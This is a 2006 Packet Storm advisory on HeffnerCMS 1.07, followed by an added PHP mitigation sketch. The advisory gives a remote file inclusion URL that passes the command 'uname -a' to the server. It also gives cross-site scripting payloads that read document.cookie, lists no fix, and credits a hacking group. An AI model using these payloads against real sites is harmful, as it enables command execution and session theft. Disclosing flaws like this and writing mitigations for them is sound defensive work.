HeffnerCMS.txt

2006-04-01T00:00:00
ID PACKETSTORM:45049
Type packetstorm
Reporter Andries Bruinsma
Modified 2006-04-01T00:00:00

Description

`Website : http://www.christian-heffner.de
  
Version : 1.07  
  
I.  
  
<?php  
  
$filename="index.php";  
  
require_once 'vlib/vlibTemplate.php';  
  
$tmpl = new vlibTemplate('tmpl/std/index.tpl');  
  
require_once 'config/db_config.php';  
  
require_once 'config/pcfunctions.php';  
  
It's flying.... :) lol
  
II. Vulnerable code:
  
  
http://www.site.com/index.php?page=evilcode.txt?&cmd=uname -a  
  
III. Cross-Site Scripting Attack
  
http://www.site.com/index.php?page=<script>alert(document.cookie)</script>  
  
http://www.site.com/index.php?page=<script>alert(Patriotic Hackers)</script>  
  
Etc..  
  
IV. Solution   
  
None
  
Greetz ; B3g0k,Azad,Nistiman,Hawar,Seyh and other our friends..   
  
irc.gigachat.net #kurdhack  
  
www.PatrioticHackers  
`
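
A mitigation sketch for the `page` parameter issues in sections II and III, as an added example that is not part of the original advisory or of HeffnerCMS. The excerpt in section I does not show how `page` is consumed, so the code assumes it selects a file to include and is reflected into HTML; the page names, paths and function names are hypothetical.

```php
<?php
// Added example, not HeffnerCMS code. Assumption: index.php uses the
// "page" request parameter to pick a file to include and echoes it back.

// Hypothetical allowlist: public page name => file shipped with the site.
const PAGES = [
    'home'    => 'pages/home.php',
    'news'    => 'pages/news.php',
    'contact' => 'pages/contact.php',
];

/**
 * Map an untrusted page name to a local file, or null if not allowed.
 * The request value is only ever used as an array key, never as a path,
 * so URLs, "../" sequences and NUL bytes cannot reach include/require.
 */
function resolve_page(mixed $requested): ?string
{
    if (!is_string($requested)) {      // ?page[]=x arrives as an array
        return null;
    }
    return PAGES[$requested] ?? null;
}

/** Escape untrusted text before placing it in HTML element content. */
function h(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return [status, body-or-file] for the raw "page" value. */
function render(mixed $raw): array
{
    $file = resolve_page($raw ?? 'home');
    if ($file === null) {
        $shown = is_string($raw) ? h($raw) : '(invalid)';
        return [404, "<p>Unknown page: {$shown}</p>"];
    }
    return [200, $file];   // caller does: require __DIR__ . '/' . $file;
}

// Constructed sample inputs modelled on the requests in sections II and III.
foreach (['news', 'evilcode.txt?', '<script>alert(document.cookie)</script>'] as $in) {
    [$status, $body] = render($in);
    echo $status, ' ', $body, PHP_EOL;
}
```

Keeping `allow_url_include = Off` in php.ini (the default since PHP 5.2) blocks remote URLs in include as defence in depth, but it does not stop inclusion of local files, so the allowlist is still needed.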